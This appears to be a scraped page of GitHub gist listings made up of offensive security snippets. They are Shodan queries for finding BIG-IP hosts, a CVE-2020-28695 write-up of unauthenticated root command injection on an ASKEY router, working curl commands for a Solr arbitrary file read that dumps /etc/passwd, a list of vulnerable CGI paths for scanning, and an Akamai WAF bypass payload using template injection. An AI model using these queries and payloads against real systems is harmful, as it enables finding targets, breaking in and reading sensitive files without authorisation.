title:"Big-IP®" org:"Organization Name"
http.title:"BIG-IP®- Redirect" org:"Organization Name"
http.favicon.hash:-335242539 "3992" org:"Organization Name"
caioluders
/ CVE-2020–28695.txt
Created
March 29, 2021 18:42
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Unauthenticated RCE as root on ASKEY router RTF3505VW through GET parameter | |
| ------------------------------------------------------------------------------ | |
| The router RTF3505VW, which is distributed by Vivo, is vulnerable to a unauthenticated RCE via a GET parameter. The vulnerability resides on the /bin/httpd, as it passes a GET parameter to a system call, see the vulnerable portion of the binary below. | |
| if (iVar1 != 0) { | |
| system("killall ping traceroute > /dev/null 2>&1"); | |
| __format = "ping %s -c %s -I %s> %s&"; | |
| puVar4 = auStack10144; |
0xf4n9x
/ gist:2075ef36cc311a5e08aac983fc92e141
Created
March 17, 2021 14:33
Solr Arbitrary File Read 0day Vulnerability
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # ip="192.168.1.12:8983" | |
| # curl -d '{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}' http://$ip/solr/db/config -H 'Content-type:application/json' | |
| # curl "http://$ip/solr/db/debug/dump?param=ContentStreams" -F "stream.url=file:///etc/passwd" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| TiVoConnect?Command=QueryServer | |
| TiVoConnect?Command=QueryContainer&Container=/&Recurse=Yes | |
| cgi-bin/cart32.exe | |
| cgi-bin/classified.cgi | |
| cgi-bin/download.cgi | |
| cgi-bin/flexform.cgi | |
| cgi-bin/flexform | |
| cgi-bin/lwgate.cgi | |
| cgi-bin/LWGate.cgi | |
| cgi-bin/lwgate |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| akamai kona waf bypass with backtrick and client-side template injection. | |
| the payload => {{constructor.constructor('alert(1)')()}} is blocked | |
| but | |
| the payload => {{constructor.constructor(alert`1`)()}} is not |